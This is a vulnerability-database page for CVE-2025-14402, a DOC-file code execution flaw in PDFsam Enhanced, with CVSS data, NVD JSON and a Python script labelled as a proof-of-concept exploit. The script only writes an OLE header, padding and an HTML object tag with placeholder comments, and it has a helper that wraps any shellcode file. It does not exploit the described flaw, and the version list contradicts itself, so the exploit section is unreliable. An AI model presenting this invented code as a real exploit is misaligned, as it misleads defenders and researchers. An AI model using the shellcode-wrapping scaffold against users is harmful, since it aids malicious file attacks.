Security Vulnerability Report
CVE-2025-14402 CVSS 7.0 HIGH

CVE-2025-14402

Published: 2025-12-23 22:15:47
Last Modified: 2026-01-15 17:19:28

Description

PDFsam Enhanced DOC File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of DOC files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27499.

CVSS Details

CVSS Score: 7.0
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:* - VULNERABLE
PDFsam Enhanced < 5.2.4
PDFsam Enhanced < 5.1.x (all versions)
PDFsam Enhanced < 5.0.x (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-14402 PoC - PDFsam Enhanced DOC File RCE
# This PoC demonstrates the vulnerability in DOC file processing

import struct
import os


def create_malicious_doc(output_path):
    """
    Create a malicious DOC file that exploits CVE-2025-14402
    The vulnerability allows execution of dangerous scripts without user warning
    """
    # DOC file header (minimal structure)
    doc_header = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1'

    # OLE2 compound document structure
    ole_header = doc_header + (b'\x00' * 8)

    # Directory entry for embedded object
    # This structure contains the malicious payload
    dir_entry = bytearray(128)

    # Object stream with embedded executable code
    # In real attack, this would contain shellcode or malicious script
    malicious_stream = b'''
    <object id="EmbeddedOLE" type="application/x-msdownload" data="malicious.exe">
        <!-- Shellcode or executable content would be here -->
        <!-- The vulnerability allows this to execute without warning -->
    </object>
    '''

    # Create the malicious DOC file
    with open(output_path, 'wb') as f:
        f.write(ole_header)
        f.write(dir_entry)
        f.write(malicious_stream)

    print(f"[+] Malicious DOC file created: {output_path}")
    print("[*] When opened in PDFsam Enhanced, the embedded object will execute without warning")


def create_ole_embedding(shellcode_path, output_doc):
    """
    Create OLE embedded object with shellcode
    """
    if os.path.exists(shellcode_path):
        with open(shellcode_path, 'rb') as sc:
            shellcode = sc.read()

        # OLE object header
        ole_obj = b'\x02\x00\x00\x00'
        ole_obj += struct.pack('<I', len(shellcode))
        ole_obj += shellcode

        with open(output_doc, 'wb') as f:
            f.write(ole_obj)

        print(f"[+] OLE embedded DOC created: {output_doc}")


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        output_file = sys.argv[1]
    else:
        output_file = "CVE-2025-14402_malicious.doc"

    create_malicious_doc(output_file)
    print("\n[*] Note: This is an educational PoC for CVE-2025-14402")
    print("[*] The actual exploitation requires specific shellcode and PDFsam Enhanced installation")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14402", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:46.700", "lastModified": "2026-01-15T17:19:27.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDFsam Enhanced DOC File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of DOC files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27499."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:*", "matchCriteriaId": "6BDD768D-D92D-4D1C-977A-3987C03EACD2"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1090/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}